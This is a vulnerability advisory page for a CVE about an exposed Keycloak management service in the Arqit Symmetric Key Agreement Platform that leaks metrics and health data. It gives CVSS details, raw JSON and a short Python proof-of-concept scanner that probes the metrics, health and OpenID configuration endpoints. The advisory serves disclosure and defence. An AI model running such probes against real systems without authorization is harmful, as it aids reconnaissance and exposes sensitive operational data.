Security Vulnerability Report
CVE-2026-33584 CVSS 5.3 MEDIUM

CVE-2026-33584

Published: 2026-05-13 19:17:07
Last Modified: 2026-05-14 17:19:50
Source: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

Description

Exposed Keycloak management service in the Arqit Symmetric Key Agreement Platform enables unauthorized access to sensitive debug information such as metrics and health data. This issue affects Symmetric Key Agreement Platform: before 26.03.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Arqit Symmetric Key Agreement Platform < 26.03

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def check_exploit(target_url):
    """
    POC to check for exposed Keycloak management endpoints.
    """
    # Common paths for Keycloak metrics or admin console
    paths = [
        "/auth/realms/master/.well-known/openid-configuration",
        "/metrics",
        "/health",
    ]
    headers = {
        "User-Agent": "CVE-2026-33584-Scanner/1.0"
    }

    for path in paths:
        url = f"{target_url.rstrip('/')}{path}"
        try:
            response = requests.get(url, headers=headers, timeout=5)
            if response.status_code == 200:
                print(f"[+] Potential sensitive data exposed at: {url}")
                print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
            else:
                print(f"[-] {url} returned status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {url}: {e}")


if __name__ == "__main__":
    target = "http://example-arqit-platform.com"
    check_exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33584", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-13T19:17:07.183", "lastModified": "2026-05-14T17:19:49.973", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposed Keycloak management \nservice in the Arqit Symmetric Key Agreement Platform enables unauthorized access to sensitive debug \ninformation such as metrics and\n health data. This issue affects Symmetric Key Agreement Platform: before 26.03."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-749"}]}], "references": [{"url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33584", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}